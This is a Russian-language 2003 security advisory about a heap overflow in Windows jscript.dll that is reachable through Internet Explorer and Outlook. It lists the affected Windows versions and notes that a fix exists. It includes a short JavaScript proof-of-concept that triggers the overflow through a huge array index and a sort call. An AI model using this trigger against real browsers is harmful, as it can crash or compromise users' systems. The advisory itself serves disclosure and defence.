Security Lab

Переполнение буфера в Windows Script Engine

Дата публикации:21.03.2003
Всего просмотров:966
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Microsoft Windows 2000 Professional
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Millenium
Microsoft Windows NT 4.0 Workstation
Microsoft Windows XP Home Edition
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Microsoft Windows XP Professional
Microsoft Windows 2000 Datacenter Server
Описание: Серьезная уязвимость обнаружена в механизме обработки сценариев в Windows системах. Удаленный атакующий может выполнить произвольный код на системе целевого пользователя.

Передавая специально сформированный JavaScript-код через Internet Explorer (IE), Outlook или Outlook Express, удаленный атакующий может переполнить динамическую память при обработке сценария Windows Script Engine и выполнить произвольный код на системе жертвы. Уязвимость присутствует в динамической библиотеке обработки JavaScript-кода jscript.dll. Пример:

<script>
    var trigger = [];
    i = 1;
    do {trigger[i] = 1;} while(i++ < 10000);
    trigger[0x3FFFFFFF] = 1;
    trigger.sort(new Function("return 1"));
</script>
Уязвимость обнаружена в Windows 98, 98SE, ME, NT4.0, 2K, XP и в версиях Jscript.dll 5.1.0.4615, 5.5.0.6330, 5.6.0.6626.
Ссылки: iDEFENSE Security Advisory 03.19.03: Heap Overflow in Windows Script Engine